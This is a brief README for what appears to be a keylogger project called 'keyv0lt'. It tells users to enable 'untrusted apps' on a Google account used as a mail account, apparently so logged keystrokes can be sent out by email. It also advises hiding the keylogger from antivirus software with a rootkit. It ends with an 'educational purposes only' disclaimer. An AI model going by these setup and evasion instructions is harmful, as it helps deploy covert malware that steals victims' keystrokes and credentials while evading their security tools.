Devvolt/keyv0lt/README.md

 You need to enable "untrusted apps" on the Google Account dashboard for the client-mail account.

 The most part of antiviruses detects this keylogger as virus.
 To prevent this, you need to hide it with a rootkit.

-Note: this software is only for educational purposes.
-I take no responsibility for the use of my software by third parties.